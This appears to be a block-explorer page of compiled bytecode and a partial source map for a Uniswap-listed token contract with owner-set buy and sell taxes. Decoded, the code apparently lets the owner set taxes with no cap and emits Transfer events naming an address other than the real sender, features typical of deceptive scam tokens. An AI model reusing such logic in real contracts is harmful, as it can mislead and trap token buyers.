01000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16036112a95760105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161129c9190611541565b60405180910390a361130f565b8573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516113069190611541565b60405180910390a35b5b600193505050509392505050565b5f60025f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b8160025f0160146101000a81548160ff021916908360ff1602179055508060025f0160156101000a81548160ff021916908360ff1602179055505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113bd5780820151818401526020810190506113a2565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113e282611386565b6113ec8185611390565b93506113fc8185602086016113a0565b611405816113c8565b840191505092915050565b5f6020820190508181035f83015261142881846113d8565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61145d82611434565b9050919050565b61146d81611453565b8114611477575f80fd5b50565b5f8135905061148881611464565b92915050565b5f819050919050565b6114a08161148e565b81146114aa575f80fd5b50565b5f813590506114bb81611497565b92915050565b5f80604083850312156114d7576114d6611430565b5b5f6114e48582860161147a565b92505060206114f5858286016114ad565b9150509250929050565b5f8115159050919050565b611513816114ff565b82525050565b5f60208201905061152c5f83018461150a565b92915050565b61153b8161148e565b82525050565b5f6020820190506115545f830184611532565b92915050565b5f805f6060848603121561157157611570611430565b5b5f61157e8682870161147a565b935050602061158f8682870161147a565b92505060406115a0868287016114ad565b9150509250925092565b5f60ff82169050919050565b6115bf816115aa565b82525050565b5f6020820190506115d85f8301846115b6565b92915050565b6115e781611453565b82525050565b5f6060820190506116005f8301866115de565b61160d60208301856115b6565b61161a60408301846115b6565b949350505050565b5f6020828403121561163757611636611430565b5b5f6116448482850161147a565b91505092915050565b611656816115aa565b8114611660575f80fd5b50565b5f813590506116718161164d565b92915050565b5f806040838503121561168d5761168c611430565b5b5f61169a85828601611663565b92505060206116ab85828601611663565b9150509250929050565b5f80604083850312156116cb576116ca611430565b5b5f6116d88582860161147a565b92505060206116e98582860161147a565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061173757607f821691505b60208210810361174a576117496116f3565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156117d2578086048111156117ae576117ad611750565b5b60018516156117bd5780820291505b80810290506117cb8561177d565b9450611792565b94509492505050565b5f826117ea57600190506118a5565b816117f7575f90506118a5565b816001811461180d576002811461181757611846565b60019150506118a5565b60ff84111561182957611828611750565b5b8360020a9150848211156118405761183f611750565b5b506118a5565b5060208310610133831016604e8410600b841016171561187b5782820a90508381111561187657611875611750565b5b6118a5565b6118888484846001611789565b9250905081840481111561189f5761189e611750565b5b81810290505b9392505050565b5f6118b68261148e565b91506118c1836115aa565b92506118ee7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846117db565b905092915050565b5f6119008261148e565b915061190b8361148e565b92508282026119198161148e565b915082820484148315176119305761192f611750565b5b5092915050565b5f6119418261148e565b915061194c8361148e565b925082820390508181111561196457611963611750565b5b92915050565b5f8151905061197881611464565b92915050565b5f6020828403121561199357611992611430565b5b5f6119a08482850161196a565b91505092915050565b5f6040820190506119bc5f8301856115de565b6119c960208301846115de565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611a078261148e565b9150611a128361148e565b925082611a2257611a216119d0565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f819050919050565b5f819050919050565b5f611ab3611aae611aa984611a87565b611a90565b61148e565b9050919050565b611ac381611a99565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611afb81611453565b82525050565b5f611b0c8383611af2565b60208301905092915050565b5f602082019050919050565b5f611b2e82611ac9565b611b388185611ad3565b9350611b4383611ae3565b805f5b83811015611b73578151611b5a8882611b01565b9750611b6583611b18565b925050600181019050611b46565b5085935050505092915050565b5f60a082019050611b935f830188611532565b611ba06020830187611aba565b8181036040830152611bb28186611b24565b9050611bc160608301856115de565b611bce6080830184611532565b9695505050505050565b5f611be28261148e565b9150611bed8361148e565b9250828201905080821115611c0557611c04611750565b5b9291505056fea264697066735822122015f1b6c36e874ab53e54e8d49c766b4a6a5d19af67c9ec839afb0aab9f3e1e3664736f6c63430008180033

Deployed Bytecode

0x6080604052600436106100e0575f3560e01c806395d89b411161007e578063c6ba48be11610058578063c6ba48be146102d9578063c9567bf914610301578063d28d885214610317578063dd62ed3e14610341576100e7565b806395d89b4114610249578063a9059cbb14610273578063b09f1266146102af576100e7565b806323b872dd116100ba57806323b872dd1461017b578063313ce567146101b75780634abe3052146101e157806370a082311461020d576100e7565b806306fdde03146100eb578063095ea7b31461011557806318160ddd14610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61037d565b60405161010c9190611410565b60405180910390f35b348015610120575f80fd5b5061013b600480360381019061013691906114c1565b61040c565b6040516101489190611519565b60405180910390f35b34801561015c575f80fd5b506101656104f9565b6040516101729190611541565b60405180910390f35b348015610186575f80fd5b506101a1600480360381019061019c919061155a565b610519565b6040516101ae9190611519565b60405180910390f35b3480156101c2575f80fd5b506101cb6105bc565b6040516101d891906115c5565b60405180910390f35b3480156101ec575f80fd5b506101f56105c1565b604051610204939291906115ed565b60405180910390f35b348015610218575f80fd5b50610233600480360381019061022e9190611622565b61060f565b6040516102409190611541565b60405180910390f35b348015610254575f80fd5b5061025d610624565b60405161026a9190611410565b60405180910390f35b34801561027e575f80fd5b50610299600480360381019061029491906114c1565b6106b4565b6040516102a69190611519565b60405180910390f35b3480156102ba575f80fd5b506102c36106c8565b6040516102d09190611410565b60405180910390f35b3480156102e4575f80fd5b506102ff60048036038101906102fa9190611677565b610754565b005b34801561030c575f80fd5b506103156107ce565b005b348015610322575f80fd5b5061032b610a0a565b6040516103389190611410565b60405180910390f35b34801561034c575f80fd5b50610367600480360381019061036291906116b5565b610a95565b6040516103749190611541565b60405180910390f35b60605f805461038b90611720565b80601f01602080910402602001604051908101604052809291908181526020018280546103b790611720565b80156104025780601f106103d957610100808354040283529160200191610402565b820191905f5260205f20905b8154815290600101906020018083116103e557829003601f168201915b5050505050905090565b5f8160045f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104e79190611541565b60405180910390a36001905092915050565b6012600a61050791906118ac565b6305f5e10061051691906118f6565b81565b5f8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546105a19190611937565b925050819055506105b3848484610ab5565b90509392505050565b601281565b6002805f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690805f0160149054906101000a900460ff1690805f0160159054906101000a900460ff16905083565b6003602052805f5260405f205f915090505481565b60606001805461063390611720565b80601f016020809104026020016040519081016040528092919081815260200182805461065f90611720565b80156106aa5780601f10610681576101008083540402835291602001916106aa565b820191905f5260205f20905b81548152906001019060200180831161068d57829003601f168201915b5050505050905090565b5f6106c0338484610ab5565b905092915050565b600180546106d590611720565b80601f016020809104026020016040519081016040528092919081815260200182805461070190611720565b801561074c5780601f106107235761010080835404028352916020019161074c565b820191905f5260205f20905b81548152906001019060200180831161072f57829003601f168201915b505050505081565b61075c61131e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146107c0576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6107ca8282611348565b5050565b6107d661131e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461080c575f80fd5b600f60159054906101000a900460ff1615610825575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610883573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108a7919061197e565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610907573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061092b919061197e565b90505f8273ffffffffffffffffffffffffffffffffffffffff1663e6a4390530846040518363ffffffff1660e01b81526004016109699291906119a9565b602060405180830381865afa158015610984573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109a8919061197e565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600f60156101000a81548160ff021916908315150217905550505050565b5f8054610a1690611720565b80601f0160208091040260200160405190810160405280929190818152602001828054610a4290611720565b8015610a8d5780601f10610a6457610100808354040283529160200191610a8d565b820191905f5260205f20905b815481529060010190602001808311610a7057829003601f168201915b505050505081565b6004602052815f5260405f20602052805f5260405f205f91509150505481565b5f80610abf61131e565b9050600f60159054906101000a900460ff1680610b0757508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80610b3d57508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b610b45575f80fd5b8260035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610b919190611937565b9250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148015610c015750600f60149054906101000a900460ff16155b8015610c72575060646012600a610c1891906118ac565b6305f5e100610c2791906118f6565b610c3191906119fd565b60035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410155b8015610caa57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15610f3e576001600f60146101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115610ce657610ce5611a2d565b5b604051908082528060200260200182016040528015610d145781602001602082028036833780820191505090505b50905030815f81518110610d2b57610d2a611a5a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610dc2573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610de6919061197e565b81600181518110610dfa57610df9611a5a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663eb6f613960646012600a610e7491906118ac565b6305f5e100610e8391906118f6565b610e8d91906119fd565b5f8430426040518663ffffffff1660e01b8152600401610eb1959493929190611b80565b5f604051808303815f87803b158015610ec8575f80fd5b505af1158015610eda573d5f803e3d5ffd5b505050508173ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015610f21573d5f803e3d5ffd5b505f600f60146101000a81548160ff021916908315150217905550505b5f8060025f0160149054906101000a900460ff1660025f0160159054906101000a900460ff16915091503073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614158015610fb7575060011515600f60159054906101000a900460ff161515145b15611098575f606460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff1614611019578361101b565b825b60ff168761102991906118f6565b61103391906119fd565b905080866110419190611937565b95508060035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461108f9190611bd8565b92505081905550505b8460035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110e49190611bd8565b9250508190555060115f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff16036111ca578573ffffffffffffffffffffffffffffffffffffffff1660105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516111bd9190611541565b60405180910390a3611310565b60115f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16036112a95760105f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161129c9190611541565b60405180910390a361130f565b8573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516113069190611541565b60405180910390a35b5b600193505050509392505050565b5f60025f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b8160025f0160146101000a81548160ff021916908360ff1602179055508060025f0160156101000a81548160ff021916908360ff1602179055505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113bd5780820151818401526020810190506113a2565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113e282611386565b6113ec8185611390565b93506113fc8185602086016113a0565b611405816113c8565b840191505092915050565b5f6020820190508181035f83015261142881846113d8565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61145d82611434565b9050919050565b61146d81611453565b8114611477575f80fd5b50565b5f8135905061148881611464565b92915050565b5f819050919050565b6114a08161148e565b81146114aa575f80fd5b50565b5f813590506114bb81611497565b92915050565b5f80604083850312156114d7576114d6611430565b5b5f6114e48582860161147a565b92505060206114f5858286016114ad565b9150509250929050565b5f8115159050919050565b611513816114ff565b82525050565b5f60208201905061152c5f83018461150a565b92915050565b61153b8161148e565b82525050565b5f6020820190506115545f830184611532565b92915050565b5f805f6060848603121561157157611570611430565b5b5f61157e8682870161147a565b935050602061158f8682870161147a565b92505060406115a0868287016114ad565b9150509250925092565b5f60ff82169050919050565b6115bf816115aa565b82525050565b5f6020820190506115d85f8301846115b6565b92915050565b6115e781611453565b82525050565b5f6060820190506116005f8301866115de565b61160d60208301856115b6565b61161a60408301846115b6565b949350505050565b5f6020828403121561163757611636611430565b5b5f6116448482850161147a565b91505092915050565b611656816115aa565b8114611660575f80fd5b50565b5f813590506116718161164d565b92915050565b5f806040838503121561168d5761168c611430565b5b5f61169a85828601611663565b92505060206116ab85828601611663565b9150509250929050565b5f80604083850312156116cb576116ca611430565b5b5f6116d88582860161147a565b92505060206116e98582860161147a565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061173757607f821691505b60208210810361174a576117496116f3565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156117d2578086048111156117ae576117ad611750565b5b60018516156117bd5780820291505b80810290506117cb8561177d565b9450611792565b94509492505050565b5f826117ea57600190506118a5565b816117f7575f90506118a5565b816001811461180d576002811461181757611846565b60019150506118a5565b60ff84111561182957611828611750565b5b8360020a9150848211156118405761183f611750565b5b506118a5565b5060208310610133831016604e8410600b841016171561187b5782820a90508381111561187657611875611750565b5b6118a5565b6118888484846001611789565b9250905081840481111561189f5761189e611750565b5b81810290505b9392505050565b5f6118b68261148e565b91506118c1836115aa565b92506118ee7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846117db565b905092915050565b5f6119008261148e565b915061190b8361148e565b92508282026119198161148e565b915082820484148315176119305761192f611750565b5b5092915050565b5f6119418261148e565b915061194c8361148e565b925082820390508181111561196457611963611750565b5b92915050565b5f8151905061197881611464565b92915050565b5f6020828403121561199357611992611430565b5b5f6119a08482850161196a565b91505092915050565b5f6040820190506119bc5f8301856115de565b6119c960208301846115de565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611a078261148e565b9150611a128361148e565b925082611a2257611a216119d0565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f819050919050565b5f819050919050565b5f611ab3611aae611aa984611a87565b611a90565b61148e565b9050919050565b611ac381611a99565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611afb81611453565b82525050565b5f611b0c8383611af2565b60208301905092915050565b5f602082019050919050565b5f611b2e82611ac9565b611b388185611ad3565b9350611b4383611ae3565b805f5b83811015611b73578151611b5a8882611b01565b9750611b6583611b18565b925050600181019050611b46565b5085935050505092915050565b5f60a082019050611b935f830188611532565b611ba06020830187611aba565b8181036040830152611bb28186611b24565b9050611bc160608301856115de565b611bce6080830184611532565b9695505050505050565b5f611be28261148e565b9150611bed8361148e565b9250828201905080821115611c0557611c04611750565b5b9291505056fea264697066735822122015f1b6c36e874ab53e54e8d49c766b4a6a5d19af67c9ec839afb0aab9f3e1e3664736f6c63430008180033

Deployed Bytecode Sourcemap

652:6954:12:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5572:91;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5220:207;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;803:66;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4989:223;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;761:35;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;985:26;;;;;;;;;;;;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;1298:44;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5671:95;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5435:129;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;726:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4210:162;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4627:354;;;;;;;;;;;;;:::i;:::-;;680:39;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1349:64;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5572:91;5617:13;5650:5;5643:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5572:91;:::o;5220:207::-;5288:4;5338:6;5305:9;:21;5315:10;5305:21;;;;;;;;;;;;;;;:30;5327:7;5305:30;;;;;;;;;;;;;;;:39;;;;5381:7;5360:37;;5369:10;5360:37;;;5390:6;5360:37;;;;;;:::i;:::-;;;;;;;;5415:4;5408:11;;5220:207;;;;:::o;803:66::-;794:2;855;:14;;;;:::i;:::-;841:11;:28;;;;:::i;:::-;803:66;:::o;4989:223::-;5105:4;5153:6;5122:9;:15;5132:4;5122:15;;;;;;;;;;;;;;;:27;5138:10;5122:27;;;;;;;;;;;;;;;;:37;;;;;;;:::i;:::-;;;;;;;;5177:27;5187:4;5193:2;5197:6;5177:9;:27::i;:::-;5170:34;;4989:223;;;;;:::o;761:35::-;794:2;761:35;:::o;985:26::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;1298:44::-;;;;;;;;;;;;;;;;;:::o;5671:95::-;5718:13;5751:7;5744:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5671:95;:::o;5435:129::-;5499:4;5523:33;5533:10;5545:2;5549:6;5523:9;:33::i;:::-;5516:40;;5435:129;;;;:::o;726:28::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;4210:162::-;4293:8;:6;:8::i;:::-;4279:22;;:10;:22;;;4275:48;;4310:13;;;;;;;;;;;;;;4275:48;4334:30;4352:4;4358:5;4334:17;:30::i;:::-;4210:162;;:::o;4627:354::-;4692:8;:6;:8::i;:::-;4678:22;;:10;:22;;;4670:31;;;;;;4721:11;;;;;;;;;;;4720:12;4712:21;;;;;;4744:16;2194:42;4763:24;;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;4744:45;;4800:13;2194:42;4816:21;;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;4800:39;;4850:13;4882:8;4866:33;;;4908:4;4915:5;4866:55;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;4850:71;;4939:5;4932:4;;:12;;;;;;;;;;;;;;;;;;4969:4;4955:11;;:18;;;;;;;;;;;;;;;;;;4659:322;;;4627:354::o;680:39::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;1349:64::-;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;5923:1680::-;6036:4;6053:16;6072:8;:6;:8::i;:::-;6053:27;;6099:11;;;;;;;;;;;:31;;;;6122:8;6114:16;;:4;:16;;;6099:31;:49;;;;6140:8;6134:14;;:2;:14;;;6099:49;6091:58;;;;;;6181:6;6162:9;:15;6172:4;6162:15;;;;;;;;;;;;;;;;:25;;;;;;;:::i;:::-;;;;;;;;6224:4;;;;;;;;;;;6218:10;;:2;:10;;;:36;;;;;6246:8;;;;;;;;;;;6245:9;6218:36;:91;;;;;1062:3;794:2;855;:14;;;;:::i;:::-;841:11;:28;;;;:::i;:::-;1048:17;;;;:::i;:::-;6271:9;:24;6289:4;6271:24;;;;;;;;;;;;;;;;:38;;6218:91;:124;;;;;6334:8;6326:16;;:4;:16;;;;6218:124;6200:712;;;6380:4;6369:8;;:15;;;;;;;;;;;;;;;;;;6399:21;6437:1;6423:16;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6399:40;;6472:4;6454;6459:1;6454:7;;;;;;;;:::i;:::-;;;;;;;:23;;;;;;;;;;;2194:42;6502:21;;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;6492:4;6497:1;6492:7;;;;;;;;:::i;:::-;;;;;;;:33;;;;;;;;;;;2194:42;6540:88;;;1062:3;794:2;855;:14;;;;:::i;:::-;841:11;:28;;;;:::i;:::-;1048:17;;;;:::i;:::-;6684:1;6708:4;6743;6771:15;6540:265;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6828:8;6820:26;;:49;6847:21;6820:49;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6895:5;6884:8;;:16;;;;;;;;;;;;;;;;;;6354:558;6200:712;6925:13;6940:14;6959:9;:16;;;;;;;;;;;;6977:9;:17;;;;;;;;;;;;6924:71;;;;7026:4;7010:21;;:4;:21;;;;:44;;;;;7050:4;7035:19;;:11;;;;;;;;;;;:19;;;7010:44;7006:280;;;7071:27;7165:3;7135:4;;;;;;;;;;;7129:10;;:2;:10;;;:31;;7153:7;7129:31;;;7142:8;7129:31;7102:59;;:6;:59;;;;:::i;:::-;7101:67;;;;:::i;:::-;7071:97;;7193:19;7183:29;;;;;:::i;:::-;;;7255:19;7227:9;:24;7245:4;7227:24;;;;;;;;;;;;;;;;:47;;;;;;;:::i;:::-;;;;;;;;7056:230;7006:280;7313:6;7296:9;:13;7306:2;7296:13;;;;;;;;;;;;;;;;:23;;;;;;;:::i;:::-;;;;;;;;7344:9;;;;;;;;;;;7336:17;;:4;:17;;;7332:242;;7395:2;7375:31;;7384:9;;;;;;;;;;;7375:31;;;7399:6;7375:31;;;;;;:::i;:::-;;;;;;;;7332:242;;;7434:9;;;;;;;;;;;7428:15;;:2;:15;;;7424:150;;7480:9;;;;;;;;;;;7465:33;;7474:4;7465:33;;;7491:6;7465:33;;;;;;:::i;:::-;;;;;;;;7424:150;;;7551:2;7536:26;;7545:4;7536:26;;;7555:6;7536:26;;;;;;:::i;:::-;;;;;;;;7424:150;7332:242;7591:4;7584:11;;;;;5923:1680;;;;;:::o;4526:93::-;4566:7;4593:9;:18;;;;;;;;;;;;4586:25;;4526:93;:::o;4380:138::-;4470:4;4451:9;:16;;;:23;;;;;;;;;;;;;;;;;;4505:5;4485:9;:17;;;:25;;;;;;;;;;;;;;;;;;4380:138;;:::o;7:99:13:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;